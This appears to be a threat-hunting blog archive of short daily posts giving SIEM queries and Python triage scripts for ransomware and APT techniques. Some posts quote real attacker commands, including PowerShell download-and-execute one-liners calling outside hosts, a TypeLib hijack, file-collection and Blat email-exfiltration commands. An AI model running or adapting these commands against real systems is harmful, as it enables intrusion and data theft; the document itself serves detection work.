Posts

Showing posts from April, 2025

119. RustDesk: An RMM You May Not Have Heard About

Hello everyone! I'm sure you are well-informed about various RMMs abused by adversaries. But have you heard about this one - RustDesk? For example, it was used ITW by Akira ransomware affiliates. The tool is available for various platforms; here's a Windows version. Let's look at some detection opportunities, and start from the binary itself:

event_type: "processcreatewin" AND proc_file_productname: "rustdesk"

You may also hunt for file or folder creation events related to RustDesk:

event_type: "filecreate" AND file_path: "rustdesk"

Make sure you check non-Windows binaries as well! See you tomorrow!

118. YDArk: Another Tool in a Ransomware Affiliate's Arsenal

Hello everyone! It's time to talk about defense evasion tools observed in ransomware attacks again! This time we'll look at Qilin's toolkit. The tool we are going to look at is YDArk. It's a powerful kernel manipulation tool that appeared on Chinese underground forums back in 2020. Of course, it's used by the adversary to kill AV/EDR-related processes. As always, we can use the original file name for detection:

event_type: "processcreatewin" AND proc_file_originalfilename: "YDArk.exe"

Also, you can focus on the driver it uses:

event_type: "driverloadwin" AND file_name: "YDArkDrv.sys"

It also creates a service - you can use that as a detection opportunity as well! See you tomorrow!

117. Hunting for Malicious IP Lookups

Hello everyone! I'm sure you know that various malware performs IP lookups to identify the compromised system's location. Usually the adversaries use legitimate services to solve this problem. What does it mean from a threat hunting perspective? We can use it to build our hunting queries! I've collected some of the commonly abused services for you, here you go:

event_type: "dnsreq" AND dns_rname: ("wtfismyip.com" OR "ipify.org" OR "icanhazip.com" OR "ip-api.com" OR "checkip.dyndns.org" OR "reallyfreegeoip.org")

You WILL get some false positives, but we are talking about hunting, right? See you tomorrow!

116. That's How Earth Kurma Abuses PowerShell for Data Collection

Hello everyone! As you know, in most cases espionage-related activity clusters need to collect sensitive data before exfiltration. Of course, they can abuse PowerShell to solve this task! For example, Earth Kurma used the following PowerShell command to collect files of interest:

C:\Windows\system32\cmd.exe /C powershell.exe "dir c:\users -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt' , '*.pptx'| where LastWriteTime -gt (Get-date).AddDays(-30) | foreach {cmd /c copy $_ /y c:\users\{username}\documents\tmp};echo Finish!"

I think you've spotted many file extensions. We can use this to build our hunting query:

event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: ("pdf" AND "doc" AND "xls" AND "ppt")

If you want to share more interesting PowerShell abuse examples, you are always welcome! See you tomor...

115. Here's How Threat Actors Abuse PowerShell for Reconnaissance and Credentials Access

Hello everyone! It's time to add a few new items to your (and my) PowerShell procedure collection! I spotted a few in a recent report on SocGholish activity by eSentire. Let's start with reconnaissance. The adversary leveraged the following PowerShell command to enumerate Active Directory:

powershell -c "$searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]\'\'); $searcher.Filter = \'(&(objectCategory=computer)(operatingSystem=*server*))\'; $searcher.PageSize = 1000; $searcher.PropertiesToLoad.Add(\'dnshostname\') > $null; $searcher.FindAll() | ForEach-Object { $_.Properties[\'dnshostname\'][0] }

We can hunt for similar activity, for example, using the following query:

event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: "DirectorySearcher"

The threat actors also used PowerShell to collect browser-related login data:

"cmd.exe" /C powershell -c ...

114. Adversaries Abuse Magnet RAM Capture to Extract Credentials

Hello everyone! Forensic tools help us during incident response engagements, but such tools may also help adversaries solve various tasks! For example, ToyMaker abused Magnet RAM Capture to obtain a memory dump of the compromised host, and used it to extract credentials:

MRCv120.exe /accepteula /silent /go

We can use both metadata and command line parameters for detection:

event_type: "processcreatewin" AND proc_file_productname: "Magnet RAM Capture" AND cmdline: ("accepteula" AND "silent" AND "go")

See you tomorrow!

113. Adversaries Abuse Trend Micro and Bitdefender to Load Malicious DLLs

Hello everyone! The threat actors keep abusing legitimate binaries for DLL Side-Loading. This time the adversaries abused Trend Micro and Bitdefender. According to a Symantec report, the Billbug espionage group used a Trend Micro binary named tmdbglog.exe to sideload a malicious DLL named tmdglog.dll, and a Bitdefender binary named bds.exe to sideload a malicious DLL named log.dll. We can hunt for executions of these binaries using their original file names (from the version info), focusing on suspicious file names and locations:

event_type: "processcreatewin" AND proc_file_originalfilename: ("PtWatchDog.exe" OR "BDSubWiz.exe")

See you tomorrow!

112. State-Sponsored Threat Actors Adopted ClickFix Technique

Hello everyone! We've talked about ClickFix a few times already. But it's quite interesting how various adversaries adopt this technique. According to a Proofpoint report, multiple state-sponsored adversaries started to use this technique. For example, TA427 (we track this activity cluster under the name Monolithic Werewolf). The threat actor masqueraded a malicious PowerShell command to look like a registration code:

powershell -windowstyle hidden -Command iwr       "hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -OutFile       "$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw; iex       $c;                                                                                    3Z5TY-76FR3-9G87H-7ZC56

As you can see, the command includes...

111. Black Basta Affiliates Use TypeLib Hijacking Technique

Hello everyone! Let's talk about not-so-common persistence techniques. According to a ReliaQuest report, Black Basta ransomware affiliates started to use a novel persistence method that involves hijacking a Component Object Model (COM) Type Library. In TypeLib hijacking, attackers modify registry entries to redirect legitimate COM objects to malicious scripts or files. The threat actors executed the following command:

reg add ""HKEY_CURRENT_USER\Software\Classes\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64"" /t REG_SZ /d "script:hxxps://drive.google[dot]com/uc?export=download^&id=1l5cMkpY9HIERae03tqqvEzCVASQKen63" /f

Note that the key lives under HKEY_CURRENT_USER, so no elevated privileges are needed to plant it. For example, we can search for reg.exe abuse:

event_type: "processcreatewin" AND proc_file_name: "reg.exe" AND cmdline: ("TypeLib" AND "script")

We can also hunt for registry modification events:

event_type: "registryvaluesetwin" AND reg_key_path: "TypeLib" AND reg...

110. Adversaries Use Maliciously Crafted .library-ms Files

Hello everyone! I'm sure everybody has heard about CVE-2025-24054, which is related to NTLM hash disclosure via spoofing. Check Point presented a report with an overview of how it's been exploited in the wild. The exploit is triggered with minimal user interaction, for example, selecting, inspecting, or performing any action other than opening or executing the file. The threat actors use malicious .library-ms files, which are distributed via phishing emails. Files with this extension are not very common, so we can hunt for file creation events:

event_type: "filecreate" AND file_path: "library-ms"

See you tomorrow!

109. Another AV/EDR Killer in a Ransomware Gang's Toolkit: ZammOcide

Hello everyone! Let's look at another tool used by ransomware gangs to disable AV/EDR solutions. I'm talking about ZammOcide. So, it's another example of abusing a vulnerable driver, this time the Zemana Anti-Malware driver (zam64.sys). Of course, we can hunt for related events:

event_type: "driverloadwin" AND file_name: "zam64.sys"

It also creates a service named "ZammOcide". We can use it for detection as well:

event_type: "serviceinstallwin" AND service_name: "ZammOcide"

Of course, the tool is used ITW! For example, by the CrazyHunter ransomware group. See you tomorrow!

108. IronHusky Abuses Piping Server for C&C

Hello everyone! Today we'll talk about another interesting service abused by the threat actors for C&C communications. According to this report by the Kaspersky team, IronHusky used the legitimate https://ppng[.]io server, powered by the piping-server project, to request commands and send back their execution results. What does it mean? We can hunt for communications with this domain:

event_type: "dnsreq" AND dns_rname: "ppng.io"

The adversary leveraged the aforementioned backdoor to download MysterySnail RAT. See you tomorrow!

107. APT29 Abuses PowerPoint for Side-Loading

Hello everyone! Side-Loading once again! According to a Check Point report, APT29 continues to distribute WINELOADER via phishing emails. These emails contain malicious links to wine.zip. The archive contains wine.exe - a legitimate PowerPoint executable, AppvIsvSubsystems64.dll - a required dependency for the PowerPoint executable to run, and ppcore.dll - a malicious DLL, GRAPELOADER, which is used to download WINELOADER. I'm sure you've already spotted a low-hanging fruit for detection! Yes, I'm talking about this renamed PowerPoint executable! For example:

event_type: "processcreatewin" AND proc_file_originalfilename: "powerpnt.exe" AND NOT proc_file_name: "powerpnt.exe"

Of course, you can hunt for other common Microsoft Office-related binaries as well! Happy hunting! See you tomorrow!

106. Hunting for Node.js Abuse

Hello everyone! I've already mentioned Node.js yesterday, but I spotted another interesting example I want to share with you. Microsoft presented a report on how adversaries misuse Node.js to deliver malware. In the described case the threat actors use the Node.js runtime (node.exe) to run a malicious JSC file (compiled JavaScript):

node.exe -r .\(unknown).js .\app.jsc

The .jsc extension is unusual in everyday Node.js development, so we can use it for our hunting query:

event_type: "processcreatewin" AND proc_file_name: "node.exe" AND cmdline: "jsc"

Have you observed any other interesting cases of Node.js abuse? See you tomorrow!

105. Hunting for Gremlin Wolf (OldGremlin)

Hello everyone! Let's look at another activity cluster - Gremlin Wolf (also known as OldGremlin). This is one of my favorite adversaries, and recently I spotted another campaign, so I decided to share some detection and hunting opportunities. The adversary distributes malicious LNK files, for example, this one. It's used to fetch and open a decoy document from a remote server, as well as to fetch a NodeJS interpreter to run a malicious JS script:

cmd.exe /c start /B \\documents-drive.com\DavWWWRoot\DIADOC_Akt_sverki-04.25.docx & start /B \\documents-drive.com\DavWWWRoot\node.exe \\documents-drive.com\DavWWWRoot\index.txt

To hunt for such activity, I would focus on WebDAV and the NodeJS interpreter, so the hunting query may look like this:

event_type: "processcreatewin" AND proc_file_name: "cmd.exe" AND cmdline: ("DavWWWRoot" AND "node.exe")

See you tomorrow!

104. Hunting for Paper Werewolf: FlashFileGrabber

Hello everyone! The last one on Paper Werewolf - I promise! This time we'll look at FlashFileGrabber. This module allows the adversary to collect various files from removable media. If we look inside the script, we can see that there are lots of file extensions. Of course, we can use this for threat hunting! You can find various extensions inside the PowerShell scripts adversaries use for sensitive data collection, so you can definitely experiment with a number of them, for example:

event_type: "ScriptExecutionWin" AND script_text: ("txt" AND "doc" AND "docx" AND "xls" AND "xlsx" AND "pdf" AND "rar" AND "zip")

I hope your threat hunting missions are going well! See you tomorrow!
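Both this post and post 116 (the Earth Kurma command line) hunt on the same signal: one command or script that names many document extensions at once. The substring queries above work, but "doc" also matches "document" and "ppt" matches nothing in a script that lists extensions as "docx" only. The following is an added example (not code from the posts or from the tools they describe) that extracts extension tokens the way they actually appear in PowerShell ('*.pdf' in -Include/-Filter, "pdf" in an array literal), counts distinct document and archive types, and adds the context flags a hunter would want: recursion, a LastWriteTime filter, staging/copy, and a removable-media check (Win32_LogicalDisk DriveType 2). The Earth Kurma command line is copied from post 116; the benign command and the removable-media script are constructed for the example and are not FlashFileGrabber's code.

```python
import re

DOC_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf", "odt"}
ARCHIVE_EXT = {"rar", "zip", "7z"}
KNOWN_EXT = DOC_EXT | ARCHIVE_EXT
GLOB_RE = re.compile(r"\*\.([A-Za-z0-9]{2,5})")              # '*.pdf' style -Include/-Filter values
QUOTED_RE = re.compile(r"['\"]\.?([A-Za-z0-9]{2,5})['\"]")    # "pdf" / ".pdf" entries in an array literal


def extract_extensions(text: str) -> set:
    """Distinct known extensions referenced as globs or quoted tokens (case-insensitive)."""
    found = {m.group(1).lower() for m in GLOB_RE.finditer(text)}
    found |= {m.group(1).lower() for m in QUOTED_RE.finditer(text)}
    return found & KNOWN_EXT


def score(text: str, min_doc_types: int = 3) -> dict:
    """Score one cmdline or ScriptBlock: how many document types it targets, plus the
    context flags that turn a file listing into a collection routine."""
    low = text.lower()
    exts = extract_extensions(text)
    flags = {
        "recurse": "-recurse" in low,
        "time_filter": "lastwritetime" in low,
        "staging": bool(re.search(r"\b(copy|move|copy-item|move-item|compress-archive)\b", low)),
        "removable_media": bool(re.search(r"drivetype\s*-eq\s*2", low)),   # DriveType 2 = removable disk
    }
    doc = sorted(exts & DOC_EXT)
    suspicious = len(doc) >= min_doc_types and (
        flags["recurse"] or flags["staging"] or flags["removable_media"])
    return {"doc_types": doc, "archive_types": sorted(exts & ARCHIVE_EXT), **flags, "suspicious": suspicious}


# Command line from post 116 (Earth Kurma), used here as sample input.
EARTH_KURMA_CMDLINE = (
    'C:\\Windows\\system32\\cmd.exe /C powershell.exe "dir c:\\users -File -Recurse -Include '
    "'*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt' , '*.pptx'| where LastWriteTime -gt "
    '(Get-date).AddDays(-30) | foreach {cmd /c copy $_ /y c:\\users\\{username}\\documents\\tmp};echo Finish!"'
)
# Constructed benign admin command: recursion, but no document extensions.
BENIGN_CMDLINE = 'powershell.exe -c "Get-ChildItem C:\\logs -Recurse -Filter *.log | Remove-Item"'
# Constructed removable-media grabber in the shape the post describes (not the real FlashFileGrabber).
REMOVABLE_SCRIPT = '''$exts = @("txt","doc","docx","xls","xlsx","pdf","rar","zip")
Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | ForEach-Object {
    Get-ChildItem $_.DeviceID -Recurse -File | Where-Object { $exts -contains $_.Extension.TrimStart(".") } |
        Copy-Item -Destination "$env:TEMP\\stage"
}'''

if __name__ == "__main__":
    for name, sample in [("earth_kurma", EARTH_KURMA_CMDLINE), ("benign", BENIGN_CMDLINE),
                         ("removable", REMOVABLE_SCRIPT)]:
        print(name, score(sample))
```

Tune min_doc_types to your estate: the post 116 query effectively demands four families, the FlashFileGrabber query eight; three plus a staging or recursion flag is a reasonable hunting starting point.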

103. Hunting for Paper Werewolf: PowerModul

Hello everyone! Are you ready to keep hunting for Paper Werewolf? I hope you are! This time let's look at PowerModul. We keep looking into this report, by the way. PowerModul is a PowerShell script which enables the adversary to receive and execute additional scripts from the C&C server. It's embedded in the "UserCache.ini" file as a Base64-encoded string:

$base = "[base64-encoded string]"; $base64 = [System.Convert]::FromBase64String($base); $code = [System.Text.Encoding]::UTF8.GetString($base64); iex $code;

To catch such activity, we should look into the ScriptBlock. Usually, if you see "FromBase64String" and "iex" together, it's most likely suspicious activity, so it's a great candidate for hunting:

event_type: "ScriptExecutionWin" AND script_text: ("FromBase64String" AND "iex")

If we look at the decoded script, we can also see multiple hunting opportunities. For example, abusing System.Net.We...
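The query above fires on the outer loader; the interesting indicators are usually one Base64 layer down. The following is an added example (not the post's code and not PowerModul) of the triage step a hunter runs on a matching ScriptBlock: find embedded Base64, decode it as UTF-8 first (the UTF8.GetString case in the post) and fall back to UTF-16LE (what -EncodedCommand and Unicode.GetString produce), peel layers until nothing decodes, and report which indicators appear at which depth. The inner script and its URL are constructed for the example; the indicator list beyond FromBase64String and iex is my own choice.

```python
import base64
import re
from typing import Optional

# Indicators from the post (FromBase64String + iex) plus a few that commonly appear in the
# decoded layer; matched on word boundaries, case-insensitively.
SUSPICIOUS = ("frombase64string", "invoke-expression", "iex", "downloadstring", "webclient")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long Base64 runs; short ones are too noisy


def _mostly_text(s: str) -> bool:
    ok = sum(1 for c in s if c.isprintable() or c in "\r\n\t")
    return bool(s) and ok / len(s) > 0.95


def decode_layer(blob: str) -> Optional[str]:
    """Decode one Base64 blob to text, or None if it is not Base64 or not text.
    UTF-8 is tried first; UTF-16LE catches -EncodedCommand style payloads, which
    decode as UTF-8 too but come out riddled with NUL bytes and fail the text check."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if _mostly_text(text):
            return text
    return None


def _first_decodable(text: str) -> Optional[str]:
    for m in B64_RE.finditer(text):
        decoded = decode_layer(m.group(0))
        if decoded is not None:
            return decoded
    return None


def unwrap(script: str, max_depth: int = 5) -> list:
    """[script as logged, layer 1, layer 2, ...]; max_depth stops runaway nesting."""
    layers = [script]
    for _ in range(max_depth):
        nxt = _first_decodable(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def triage(script: str) -> dict:
    """Verdict for the post's query plus per-layer indicators (depth 0 is the outer script)."""
    layers = unwrap(script)
    indicators = {}
    for depth, text in enumerate(layers):
        low = text.lower()
        hits = [w for w in SUSPICIOUS if re.search(r"\b" + re.escape(w) + r"\b", low)]
        if hits:
            indicators[depth] = hits
    outer = layers[0].lower()
    return {"layers": len(layers), "indicators": indicators,
            "matches_post_query": "frombase64string" in outer and "iex" in outer}


# Constructed inner stage (not PowerModul) and a wrapper in the shape shown in the post.
INNER = "$c = New-Object System.Net.WebClient; iex $c.DownloadString('http://c2.example/stage2')"


def wrap(inner: str, encoding: str = "utf-8") -> str:
    blob = base64.b64encode(inner.encode(encoding)).decode()
    return (f'$base = "{blob}"; $base64 = [System.Convert]::FromBase64String($base); '
            f'$code = [System.Text.Encoding]::UTF8.GetString($base64); iex $code;')


SAMPLE = wrap(INNER)

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run it against the script_text field of every hit from the query above; a hit whose decoded layer carries download-and-execute indicators is worth an alert, while a hit that decodes to a vendor's signed installer boilerplate can be baselined.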

102. Hunting for Paper Werewolf

Hello everyone! Let's keep talking about threat hunting! Paper Werewolf is in the news, so let's focus on this activity cluster and look into this report. The procedure we're going to look at is the following:

cmd.exe /c if not exist "C:\Users\user\UserCacheHelper.lnk.js" echo var objService = GetObject("winmgmts:\\\\.\\root\\cimv2");var objStartup = objService.Get("Win32_ProcessStartup");var objConfig = objStartup.SpawnInstance_();objConfig.ShowWindow = 0;var processClass = objService.Get("Win32_Process");var command = "powershell.exe -c \"$raw= Get-Content C:\\Users\\user\\UserCache.ini;Invoke-Expression $raw\"";var result = processClass.Create(command, null, objConfig, 0); > C:\Users\user\UserCacheHelper.lnk.js

It's used to drop a JavaScript file named UserCacheHelper.lnk.js onto the disk. The script runs PowerModul. I would suggest hunting for similar activity focusing on two cmdlets: Get-Content ...

101. Gamaredon Hides C&C Server Address Under the Registry

Hello everyone! In some cases you can find a C&C server address in not-so-common places, for example, the Windows registry. If we look through this report on Gamaredon's GammaSteel, we can see that the adversary does just this:

IWshShell3.RegWrite("HKEY_CURRENT_USER\Console\WindowsUpdates", "http://172.104.187.254/mood/1/3/2025/confer.html?=[REMOVED]", "REG_SZ");

As you can see, it uses "HKEY_CURRENT_USER\Console\WindowsUpdates" to store the C&C address. It means we can search for its modification events:

event_type: "registryvalueset" AND reg_key_path: "Console\\WindowsUpdates"

Of course, this approach won't allow you to detect similar activity for a long time, so you can experiment with variations of key names as well as hunt for URLs being written to various registry keys. See you tomorrow!
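This post and post 111 (TypeLib hijacking) both end at the same question: what is a registry value supposed to look like, so that the odd ones stand out? The following is an added example (not code from either post or from the reports they cite) that inspects one registryvalueset event. For a TypeLib win32/win64 key it checks that the value is a local type library (.tlb, or a .dll/.ocx/.exe carrying the library as a resource) rather than a script: moniker or a URL, and notes when the key sits under HKEY_CURRENT_USER, where per-user Classes shadow HKLM without admin rights; for any other key it flags a URL in the data unless the key is one where URLs are expected. It also parses a reg add command line, undoing cmd.exe's ^& escape and the doubled quotes in the post's copy. The legitimate-value shapes and the allow-list are assumptions of this example; the reg add command is the one from post 111, the Gamaredon key and URL are from this post, and the other events are constructed.

```python
import re

TYPELIB_RE = re.compile(r"\\Classes\\TypeLib\\?\{[0-9A-Fa-f-]{36}\}\\[^\\]+\\\d+\\win(32|64)$", re.IGNORECASE)
SCRIPT_MONIKER_RE = re.compile(r"^\s*(script|javascript|vbscript):", re.IGNORECASE)
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
# Assumed shape of a normal TypeLib registration: local .tlb, or a binary with an
# optional trailing \<resource id>.
LOCAL_LIB_RE = re.compile(r"^(?:[A-Za-z]:\\|%[A-Za-z_]+%\\).+\.(tlb|dll|ocx|exe)(\\\d+)?$", re.IGNORECASE)
# Keys where a URL in a value is normal; extend from your own baseline (assumption).
URL_EXPECTED_KEYS = ("\\internet explorer\\", "\\typedurls", "\\uninstall\\", "\\microsoft\\edge\\")


def parse_reg_add(cmdline: str):
    """Recover (key, data) from `reg add <key> ... /d <data>`; strips cmd.exe carets
    and collapses the doubled quotes seen in the post's copy of the command."""
    s = cmdline.replace('""', '"').replace("^", "")
    m = re.search(r'reg(?:\.exe)?\s+add\s+"?([^"\s]+)"?.*?/d\s+"?([^"]+)"?', s, re.IGNORECASE)
    return (m.group(1), m.group(2)) if m else None


def inspect_registry_value(key_path: str, data: str) -> list:
    """Findings for one registryvalueset event; an empty list means nothing odd."""
    key = key_path.replace("/", "\\")
    findings = []
    if TYPELIB_RE.search(key):
        if SCRIPT_MONIKER_RE.match(data):
            findings.append("typelib_script_moniker")     # scriptlet instead of a type library
        elif URL_RE.search(data):
            findings.append("typelib_remote_url")
        elif not LOCAL_LIB_RE.match(data):
            findings.append("typelib_unexpected_target")
        if findings and key.upper().startswith(("HKEY_CURRENT_USER", "HKCU")):
            findings.append("hkcu_override")              # per-user Classes win over HKLM; no admin needed
    elif URL_RE.search(data) and not any(k in key.lower() for k in URL_EXPECTED_KEYS):
        findings.append("url_in_registry_value")
    return findings


# reg add command from post 111, as logged in a process-creation event.
POST_CMD = r'''reg add ""HKEY_CURRENT_USER\Software\Classes\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64"" /t REG_SZ /d "script:hxxps://drive.google[dot]com/uc?export=download^&id=1l5cMkpY9HIERae03tqqvEzCVASQKen63" /f'''
# Constructed registry events.
LEGIT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64"
LEGIT_DATA = r"C:\Windows\System32\ieframe.dll\1"        # shape of a normal registration (assumed)
GAMAREDON_KEY = r"HKEY_CURRENT_USER\Console\WindowsUpdates"
GAMAREDON_DATA = "http://172.104.187.254/mood/1/3/2025/confer.html?=[REMOVED]"
IE_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main"

if __name__ == "__main__":
    key, data = parse_reg_add(POST_CMD)
    print(inspect_registry_value(key, data))
    print(inspect_registry_value(LEGIT_KEY, LEGIT_DATA))
    print(inspect_registry_value(GAMAREDON_KEY, GAMAREDON_DATA))
    print(inspect_registry_value(IE_KEY, "https://intranet.example/"))
```

The url_in_registry_value check is the noisy one, which is exactly what the post warns about; the allow-list is where your baselining effort goes, while the TypeLib checks should stay close to zero hits on a clean estate.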

100. The Adversary Abuses Canarytokens to Collect System Information

Hello everyone! Sapphire Werewolf has updated Amethyst Stealer and now abuses Canarytokens to collect information about compromised systems. Despite the fact that Canarytokens are meant to spot malicious activity, adversaries may use them to be notified about a new victim! The adversary leveraged the following link to collect information about the compromised system, including its IP address and whether it's a virtual machine or not:

hxxp://canarytokens[.]com/traffic/tags/static/xjemqlqirwqru9pkrh3j4ztmf/payments.js

Sure, we can hunt for suspicious domain resolutions:

event_type: "dnsreq" AND dns_rname: "canarytokens.com"

You can find more information on Sapphire Werewolf's tactics, techniques and procedures in this report. See you tomorrow!

099. Hunting for CLFS Exploit Activity Artifacts

Hello everyone! I think you've already heard about a zero-day vulnerability in the Common Log File System (CLFS) weaponized by RansomEXX affiliates. I'm talking about CVE-2025-29824. If you look through the Microsoft Threat Intelligence Center (MSTIC) report, you can spot a curious artifact. As part of the exploitation, a CLFS BLF file is created: C:\ProgramData\SkyPDF\PDUDrv.blf. What does it mean? We can hunt for similar activity! For example:

event_type: "filecreatewin" AND file_path: ("programdata" AND "blf")

Despite the fact that the adversary exploited a zero-day vulnerability for privilege escalation, the kill chain included some easily detectable behaviors, for example, abusing ProcDump to dump LSASS. As always - we have lots of detection opportunities even in such cases! See you tomorrow!

098. Adversaries Keep Abusing Blat for Data Exfiltration

Hello everyone! Today I decided to share some information on an interesting exfiltration tool abused by Rare Werewolf. It's called Blat. It's been used by this activity cluster for quite a long time; here's an example:

blat.exe -to in@vniir.nl -f "TELEGRAM<sent1@vniir.nl>" -server mail.vniir.nl -port 587 -u sent1@vniir.nl -pw fuFhDK3anVteQCvfVQWk -subject "Telegram 927537/user" -body "Telegram 927537/user" -attach "C:\Users\user\Window\tdata.rar"

As you can see, the adversary uses this tool to exfiltrate collected Telegram messenger data. So, yes, Blat is just a small legitimate utility enabling the threat actors to send collected data via email! We can hunt for such behaviors focusing on credentials and attachments:

event_type: "processcreatewin" AND proc_file_originalfilename: "blat.exe" AND cmdline: ("u" AND "pw" AND "attach")

By the way, the sample has even more interestin...

097. Adversaries Abuse PowerShell to Generate Malicious Links

Hello everyone! I'm sure everybody has already got tired of the ClickFix technique, but let me show you another interesting case I spotted recently. It's again about PowerShell abuse. This time adversaries used it to generate the download link:

powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 168.119.173[.]205:8080/$u|iex"

As you can see, it gets the number of seconds since the Unix epoch (Jan 1, 1970), clears the low four bits with the -band mask so that every run within the same 16-second window produces the same value, uses it to build a URL, then downloads and executes the payload in memory. Of course, we can easily detect such activity, for example, using this logic:

event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: ("datetime" AND "UtcNow" AND "1970" AND "iex")

Have you seen other interesting scripts in ClickFix campaigns? See you tomorrow!
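Once the query above fires, the next question is which URL the host actually fetched, so you can pivot into proxy or web-filter logs even though the path changes every 16 seconds. The following is an added example (not code from the post) that reproduces the $u computation, lists every path the one-liner could have requested in a window around the process-creation timestamp, and mirrors the post's four-substring match. The C2 host:port is the defanged one from the post's command line and is used only as a string; the timestamp is made up for the example. The [int64] cast in PowerShell rounds rather than truncates, which the code reproduces with round(); with the low four bits masked off that only matters within a second of a 16-second boundary.

```python
from datetime import datetime, timedelta, timezone

C2 = "168.119.173.205:8080"                 # host:port from the post's command line (illustrative only)
MASK = 0xFFFFFFFFFFFFFFF0                    # -band 0xfffffffffffffff0: clear the low 4 bits
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
INDICATORS = ("datetime", "utcnow", "1970", "iex")   # the four substrings in the post's query


def epoch_bucket(ts: datetime) -> int:
    """Reproduce $u: seconds since the Unix epoch, rounded like a PowerShell [int64]
    cast, then rounded down to a multiple of 16."""
    secs = round((ts - EPOCH).total_seconds())
    return secs & MASK


def payload_url(ts: datetime) -> str:
    return f"http://{C2}/{epoch_bucket(ts)}"


def candidate_urls(start: datetime, end: datetime) -> list:
    """Every distinct URL the one-liner could have requested in [start, end]."""
    buckets = set()
    t = start
    while t <= end:
        buckets.add(epoch_bucket(t))
        t += timedelta(seconds=16)
    buckets.add(epoch_bucket(end))
    return [f"http://{C2}/{b}" for b in sorted(buckets)]


def matches_post_query(cmdline: str) -> bool:
    """Same logic as the post's hunting query: all four substrings, case-insensitive."""
    low = cmdline.lower()
    return all(tok in low for tok in INDICATORS)


def proxy_pivot(event_ts: datetime, skew: timedelta = timedelta(seconds=60)) -> list:
    """URLs to search for in proxy logs for one process-creation event, allowing for
    clock skew between the endpoint and the log source."""
    return candidate_urls(event_ts - skew, event_ts + skew)


# Constructed sample event: the post's command line (defanging removed) with a made-up timestamp.
SAMPLE_CMDLINE = ('powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]\'1970-1-1\')'
                  '.TotalSeconds)-band 0xfffffffffffffff0;irm 168.119.173.205:8080/$u|iex"')
SAMPLE_TS = datetime(2025, 4, 10, 12, 0, 7, tzinfo=timezone.utc)

if __name__ == "__main__":
    print(matches_post_query(SAMPLE_CMDLINE), payload_url(SAMPLE_TS))
    for url in proxy_pivot(SAMPLE_TS):
        print(url)
```

The skew parameter matters in practice: endpoint clocks and proxy clocks rarely agree to the second, and a one-minute window costs only nine candidate paths.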

096. Hunting for Canon IJ Printer Assistant Tool Abuse

Hello everyone! Let's talk about Mustang Panda (we track this cluster as Horned Werewolf, as you remember) one more time. The adversary enjoys DLL Side-Loading, and always finds new vulnerable binaries. For example, this time the cluster used Canon IJ Printer Assistant Tool. Can we hunt for such activity? Of course! Let's start with Canon IJ Printer Assistant Tool (cnmpaui.exe) running from uncommon locations:

event_type: "processcreatewin" AND proc_file_originalfilename: "cnmpaui.exe" AND NOT proc_file_path: "Canon\\Canon IJ Printer Assistant Tool"

Another notable behavior is cnmpaui.exe spawning winword.exe to display a decoy document:

event_type: "processcreatewin" AND proc_p_file_path: "cnmpaui.exe" AND proc_file_path: "winword.exe"

As always, you can find more if you want! Happy hunting! See you tomorrow!

095. Inside Play Ransomware Toolkit: WKTools

Hello everyone! I hope you are still not bored digging into ransomware gangs' toolkits. This time we'll look at another defense evasion tool - WKTools. Yes, this is another tool abused by adversaries to terminate AV/EDR-related processes. For example, it's used by the Play ransomware gang ITW. Let's start with detecting the tool's execution:

event_type: "processcreatewin" AND (proc_file_originalfilename: "WKTools.exe" OR proc_file_description: "Windows Kernel Tools" OR proc_file_productname: "WKTools")

As you may have guessed, the tool creates a driver:

event_type: "filecreatewin" AND file_name: "wktools.sys"

And it also deletes the driver:

event_type: "filedeletewin" AND file_name: "wktools.sys"

As you can see, most of these tools are really noisy, so all you need is to know where to look! See you tomorrow!

094. Detecting ClickOnce Abuse

Hello everyone! Today I've spotted another technique I don't see used ITW very often. I'm talking about ClickOnce. It's a Microsoft technology that enables the user to install and run a Windows-based smart client application by clicking a link in a web page. I've seen this technique in the report on APT-C-47. The adversary leveraged phishing to deliver a link to a malicious ClickOnce file (.appref-ms), which starts the kill chain. Of course, you can hunt for execution of such files from suspicious locations, for example, Outlook-related folders:

event_type: "processcreatewin" AND cmdline: ("appref-ms" AND "Content.Outlook")

If you want to learn more about ClickOnce abuse, here's a great presentation by William Joseph Burke IV. See you tomorrow!

093. Detecting RokRAT's PowerShell Abuse

Hello everyone! I've spotted another interesting malicious LNK file, which abuses PowerShell to drop RokRAT, so let's look at detection opportunities you can use both for searching for suspicious activity in your network and for finding new similar files using external sources like VirusTotal. So, the LNK file executes the following command:

